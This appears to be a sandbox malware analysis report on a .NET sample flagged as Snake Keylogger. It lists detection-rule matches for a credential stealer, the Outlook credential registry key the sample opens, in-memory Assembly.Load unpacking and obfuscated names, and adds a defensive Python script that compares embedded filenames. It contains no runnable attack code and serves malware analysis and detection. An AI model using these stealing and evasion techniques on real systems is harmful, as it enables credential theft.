                Source: XFo9jVGyLQ.exe, 00000000.00000002.881670890.0000000007E30000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs XFo9jVGyLQ.exe
                Source: XFo9jVGyLQ.exe, 00000000.00000000.863641256.0000000000F30000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameAPWe.exeB vs XFo9jVGyLQ.exe
                Source: XFo9jVGyLQ.exe, 00000000.00000002.875697487.000000000340B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRemington.exe4 vs XFo9jVGyLQ.exe
                Source: XFo9jVGyLQ.exe, 00000001.00000002.3335097709.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRemington.exe4 vs XFo9jVGyLQ.exe
                Source: XFo9jVGyLQ.exe, 00000001.00000002.3335368575.0000000000B37000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs XFo9jVGyLQ.exe
                Source: XFo9jVGyLQ.exe | Binary or memory string: OriginalFilenameAPWe.exeB vs XFo9jVGyLQ.exe
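The OriginalFilename rows above are read out of the version resource (VS_VERSIONINFO) of every PE image the sandbox found in memory. The submitted file names itself APWe.exe, while the dumped regions carry Remington.exe and Montero.dll, which is what a loader with an embedded second stage looks like; the clr.dll and UNKNOWN_FILE rows are the runtime's own images. The single trailing character after each name (the 8 in Montero.dll8, the 4 in Remington.exe4, the B in APWe.exeB) is most likely the byte following the string's terminator picked up by the sandbox's string scanner, not part of the name. The script below is an added example written for this report, not Joe Sandbox code: it pulls every OriginalFilename out of a byte blob (a file on disk or a raw process dump, where a resource-tree walk with pefile fails because the outer headers are gone) and lists the values that disagree with the on-disk name. The sample blob is constructed inline to mirror this report's three names; the helper that builds VS_VERSIONINFO String entries exists only to create that test data.

```python
"""Extract OriginalFilename values from a PE or memory dump and compare them
with the on-disk name. Added example for this report, not Joe Sandbox code."""
import re
import struct
import sys

# VS_VERSIONINFO String entry layout: wLength, wValueLength, wType, then the key
# as a NUL-terminated UTF-16LE string, padding to a 32-bit boundary, then the
# NUL-terminated UTF-16LE value.
KEY = "OriginalFilename".encode("utf-16-le")


def extract_original_filenames(blob: bytes) -> list:
    """Return every OriginalFilename value found in blob, in file order.

    The scan keys on the UTF-16LE key string instead of walking the resource
    tree, so it also works on partial dumps whose outer headers are missing.
    """
    names = []
    for match in re.finditer(re.escape(KEY), blob):
        pos = match.end()
        # Skip the key's NUL terminator plus any alignment padding (NUL words).
        while pos + 1 < len(blob) and blob[pos:pos + 2] == b"\x00\x00":
            pos += 2
        chars = []
        while pos + 1 < len(blob) and blob[pos:pos + 2] != b"\x00\x00":
            chars.append(blob[pos:pos + 2])
            pos += 2
        value = b"".join(chars).decode("utf-16-le", errors="replace").strip()
        # An unprintable "value" means we ran into the next struct's header.
        if value and all(c.isprintable() for c in value):
            names.append(value)
    return names


def mismatched_names(blob: bytes, on_disk_name: str) -> list:
    """OriginalFilename values that differ from the on-disk name (case-insensitive).

    One mismatch is worth a look (renamed or impersonating binary); two or more
    distinct values mean the file carries at least one embedded PE, as here.
    """
    found = extract_original_filenames(blob)
    return sorted({n for n in found if n.lower() != on_disk_name.lower()})


def _vs_string(key: str, value: str) -> bytes:
    """Build one VS_VERSIONINFO String entry. Used only to construct sample data."""
    k = key.encode("utf-16-le") + b"\x00\x00"
    v = value.encode("utf-16-le") + b"\x00\x00"
    pad = b"\x00" * ((4 - (6 + len(k)) % 4) % 4)  # align Value to 32 bits
    body = k + pad + v
    return struct.pack("<HHH", 6 + len(body), len(value) + 1, 1) + body


# Constructed stand-in for a process dump: the outer image (APWe.exe) followed by
# two further version resources (Remington.exe, Montero.dll) later in memory.
SAMPLE_DUMP = (
    b"MZ\x90\x00" + b"\x00" * 60
    + _vs_string("CompanyName", "Example")
    + _vs_string("OriginalFilename", "APWe.exe")
    + b"\xcc" * 32
    + _vs_string("OriginalFilename", "Remington.exe")
    + b"\xcc" * 32
    + _vs_string("OriginalFilename", "Montero.dll")
)


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            data = fh.read()
        name = sys.argv[1].replace("/", "\\").rsplit("\\", 1)[-1]
    else:
        data, name = SAMPLE_DUMP, "XFo9jVGyLQ.exe"
    print("OriginalFilename values:", extract_original_filenames(data))
    print("not matching", name + ":", mismatched_names(data, name))
```

Run it against a process dump taken at the same point as the 00000002 memory snapshots in this report and the three names come back together; run it against a clean, unrenamed binary and mismatched_names returns an empty list.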
                Source: XFo9jVGyLQ.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0.2.XFo9jVGyLQ.exe.4d36288.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.XFo9jVGyLQ.exe.4d36288.2.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.XFo9jVGyLQ.exe.4d36288.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 1.2.XFo9jVGyLQ.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 1.2.XFo9jVGyLQ.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 1.2.XFo9jVGyLQ.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.XFo9jVGyLQ.exe.4d36288.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.XFo9jVGyLQ.exe.4d36288.2.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.XFo9jVGyLQ.exe.4d36288.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.XFo9jVGyLQ.exe.4cae868.4.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.XFo9jVGyLQ.exe.4cae868.4.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.XFo9jVGyLQ.exe.4c26e48.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.XFo9jVGyLQ.exe.4c26e48.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000001.00000002.3335097709.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.877240881.00000000049F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: XFo9jVGyLQ.exe PID: 7020, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: XFo9jVGyLQ.exe PID: 7072, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: XFo9jVGyLQ.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.XFo9jVGyLQ.exe.4d36288.2.raw.unpack, m---.cs | Cryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.XFo9jVGyLQ.exe.4d36288.2.raw.unpack, --.cs | Cryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.XFo9jVGyLQ.exe.4d36288.2.raw.unpack, --.cs | Cryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.XFo9jVGyLQ.exe.4cae868.4.raw.unpack, zo37rSQVkQ5Zi1XDwG.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.XFo9jVGyLQ.exe.4cae868.4.raw.unpack, zo37rSQVkQ5Zi1XDwG.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.XFo9jVGyLQ.exe.4cae868.4.raw.unpack, zo37rSQVkQ5Zi1XDwG.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.XFo9jVGyLQ.exe.4cae868.4.raw.unpack, E07llS6X8rtulXNqpw.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.XFo9jVGyLQ.exe.4cae868.4.raw.unpack, E07llS6X8rtulXNqpw.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.XFo9jVGyLQ.exe.4c26e48.1.raw.unpack, E07llS6X8rtulXNqpw.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.XFo9jVGyLQ.exe.4c26e48.1.raw.unpack, E07llS6X8rtulXNqpw.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.XFo9jVGyLQ.exe.4c26e48.1.raw.unpack, zo37rSQVkQ5Zi1XDwG.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.XFo9jVGyLQ.exe.4c26e48.1.raw.unpack, zo37rSQVkQ5Zi1XDwG.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.XFo9jVGyLQ.exe.4c26e48.1.raw.unpack, zo37rSQVkQ5Zi1XDwG.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.XFo9jVGyLQ.exe.7e30000.6.raw.unpack, zo37rSQVkQ5Zi1XDwG.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.XFo9jVGyLQ.exe.7e30000.6.raw.unpack, zo37rSQVkQ5Zi1XDwG.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.XFo9jVGyLQ.exe.7e30000.6.raw.unpack, zo37rSQVkQ5Zi1XDwG.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.XFo9jVGyLQ.exe.7e30000.6.raw.unpack, E07llS6X8rtulXNqpw.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.XFo9jVGyLQ.exe.7e30000.6.raw.unpack, E07llS6X8rtulXNqpw.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@3/1@3/3
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\XFo9jVGyLQ.exe.log
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Mutant created: NULL
                Source: XFo9jVGyLQ.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: XFo9jVGyLQ.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002D43000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002D10000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002D1E000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002D50000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002D00000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: XFo9jVGyLQ.exe | Virustotal: Detection: 75%
                Source: XFo9jVGyLQ.exe | ReversingLabs: Detection: 73%
                Source: unknown | Process created: C:\Users\user\Desktop\XFo9jVGyLQ.exe "C:\Users\user\Desktop\XFo9jVGyLQ.exe"
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Process created: C:\Users\user\Desktop\XFo9jVGyLQ.exe "C:\Users\user\Desktop\XFo9jVGyLQ.exe"
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Section loaded: mscoree.dll
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Section loaded: dwrite.dll
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Section loaded: windowscodecs.dll
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Section loaded: textshaping.dll
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Section loaded: mscoree.dll
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Section loaded: rasapi32.dll
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Section loaded: rasman.dll
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Section loaded: rtutils.dll
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Section loaded: mswsock.dll
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Section loaded: winhttp.dll
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Section loaded: dhcpcsvc6.dll
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Section loaded: dhcpcsvc.dll
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Section loaded: dnsapi.dll
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Section loaded: winnsi.dll
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Section loaded: fwpuclnt.dll
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Section loaded: secur32.dll
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Section loaded: schannel.dll
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Section loaded: mskeyprotect.dll
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Section loaded: ntasn1.dll
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Section loaded: ncrypt.dll
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Section loaded: ncryptsslp.dll
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (the standard Outlook account-settings subkey in which stored mail-account credentials live; the key mail-credential stealers read)
Source: XFo9jVGyLQ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR (a .NET assembly)
Source: XFo9jVGyLQ.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: XFo9jVGyLQ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: XFo9jVGyLQ.exe | Binary string: APWe.pdb
Source: XFo9jVGyLQ.exe | Binary string: APWe.pdbSHA2564 (the PDB path from the CodeView debug entry followed by the checksum-algorithm name of a PdbChecksum debug entry, as recent Roslyn builds emit)

Data Obfuscation

Source: 0.2.XFo9jVGyLQ.exe.4cae868.4.raw.unpack, zo37rSQVkQ5Zi1XDwG.cs | .Net Code: NiM4mycMYo calls System.Reflection.Assembly.Load(byte[])
Source: 0.2.XFo9jVGyLQ.exe.41ba508.3.raw.unpack, MainForm.cs | .Net Code: _200C_202A_200E_202D_202D_206E_202D_202E_202A_206A_200E_202D_206B_206B_206E_206A_202C_206E_202E_200D_206B_206E_202C_202C_202B_200E_200C_202B_202C_206E_200D_200E_206C_202A_202E_206C_202B_202D_206B_200C_202E calls System.Reflection.Assembly.Load(byte[])
Source: 0.2.XFo9jVGyLQ.exe.4c26e48.1.raw.unpack, zo37rSQVkQ5Zi1XDwG.cs | .Net Code: NiM4mycMYo calls System.Reflection.Assembly.Load(byte[])
Source: 0.2.XFo9jVGyLQ.exe.41da528.0.raw.unpack, MainForm.cs | .Net Code: _200C_202A_200E_202D_202D_206E_202D_202E_202A_206A_200E_202D_206B_206B_206E_206A_202C_206E_202E_200D_206B_206E_202C_202C_202B_200E_200C_202B_202C_206E_200D_200E_206C_202A_202E_206C_202B_202D_206B_200C_202E calls System.Reflection.Assembly.Load(byte[])
Source: 0.2.XFo9jVGyLQ.exe.7e30000.6.raw.unpack, zo37rSQVkQ5Zi1XDwG.cs | .Net Code: NiM4mycMYo calls System.Reflection.Assembly.Load(byte[])
Note: Assembly.Load(byte[]) maps a managed assembly straight from a memory buffer, so the next stage never touches disk; this is the in-memory unpacker. The MainForm method name is made entirely of Unicode format characters (U+200C/U+200D/U+200E zero-width marks, U+202A..U+202E bidirectional controls, U+206A..U+206E), shown here as _XXXX escapes; such a name renders as nothing in most decompilers and is a common .NET obfuscator trick.
Source: XFo9jVGyLQ.exe | Static PE information: TimeDateStamp 0xAD89030B [Wed Apr 5 04:39:39 2062 UTC], a date in the future. Caveat: Roslyn deterministic builds write a content hash into this field instead of a time, so for a .NET binary an impossible date is a weak indicator on its own.
Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 0_2_07667750 push cs; ret (0_2_07667751)
Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 0_2_0787028A pushad; ret (0_2_07870299)
Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 0_2_0787D0FD push FFFFFF8Bh; iretd (0_2_0787D0FF)
Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 0_2_0787B9A8 push esp; ret (0_2_0787B9ED)
Source: C:\Users\user\Desktop\XFo9jVGyLQ.exe | Code function: 1_2_0673890D push es; ret (1_2_06738920)
Note: push X; ret pairs found at heap addresses of a .NET process are frequently data or metadata that the scanner disassembled as code rather than deliberate anti-disassembly; treat them as low-confidence.
Source: XFo9jVGyLQ.exe | Static PE information: section name: .text entropy: 7.766159248335199 (close to the 8.0 maximum; consistent with an encrypted payload that the Assembly.Load(byte[]) unpacker decrypts at run time)
Source: 0.2.XFo9jVGyLQ.exe.4cae868.4.raw.unpack, 0.2.XFo9jVGyLQ.exe.4c26e48.1.raw.unpack and 0.2.XFo9jVGyLQ.exe.7e30000.6.raw.unpack (three memory dumps of the same unpacked assembly; the report lists the identical 21 classes for each, given once here) | High entropy of concatenated method names:
TKlhyyuHllX5xyhmu0.cs: 'ToString', 'p1VXhRa7R1', 'ATqX3QlSUW', 'BMAXSrPr0X', 'lmvXaSkr5t', 'IE0XpvWujx', 'PUjXk4wMjc', 'nhWX9QXYCe', 'oYYXteI0ev', 'vBcXb1UlDE'
In9xe9q4VPmZ13gRAeD.cs: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'AxTeL7aGP6', 'DTKe8lUrX1', 'IMdeJMIpHN', 'beYeep46u0', 'eyGe20EEuT', 'Q4veAitLTf', 'OSqe02bimd'
HYu8KTKNHIOYhAZOIS.cs: 'KYZnD835yU', 'oY4ni6CSDR', 'QZD5yRrXGg', 'Ogs5qoPurV', 'HLSnhEKEaA', 'NyrnWFDQOg', 'FgunEqxdBo', 'N94nZaE9KO', 'xVLnckD0oF', 'Hf3nuglNAF'
t5Qc6FEcD6PZ7vgsIT.cs: 'KS0o6Gi6mO', 'mHrosHpcmI', 'v35odD0D3R', 'vvao3bBbig', 'nvloaHwVyh', 'o1WopgLQAW', 'FBbo9223wB', 'hxKotorkpW', 'YVSoVPQhpQ', 'YlMohgNb8n'
E07llS6X8rtulXNqpw.cs: 'AoiwZckb7T', 'w5bwceUkYW', 'pMLwuurVF7', 'anDw79StNi', 'JrBwPBvJNW', 'YPmwKCE783', 'LKNw1jmtPU', 'pIRwD2LokG', 'pIwwr6KIQi', 'DeKwijANxr'
gJ0MwAqy0rm5YlKHTad.cs: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'JZU8hSkV4a', 'ac58W6OOaO', 'EIJ8EcU0yc', 't6t8ZGto9F', 'vQR8cpL9fa', 'pt98uOgJDe', 'id187vNn9k'
RmccBRspdjIa6yA0yR.cs: 'iuMxIvewxh', 'dmkxTEH3tC', 'hhtx6P1X03', 'kmLxsPyA0r', 'AAExgeZHUv', 'G4yxXDE36y', 'cTQxndLAbE', 'IaDx5Qw4sE', 'ugdxLjXPYW', 'IcNx8fTS10'
XMj0lhrZosjVL5Hnup.cs: 'PqnLdNMyVY', 'p3FL3NwAVx', 'hwXLSbr8pb', 'AXhLaMSW3M', 'uAXLpqBYE4', 'cYJLkqWUqx', 'mgML97VXRn', 'q6PLtKWsMg', 'z5nLbGVYB3', 'qBpLVSVIjJ'
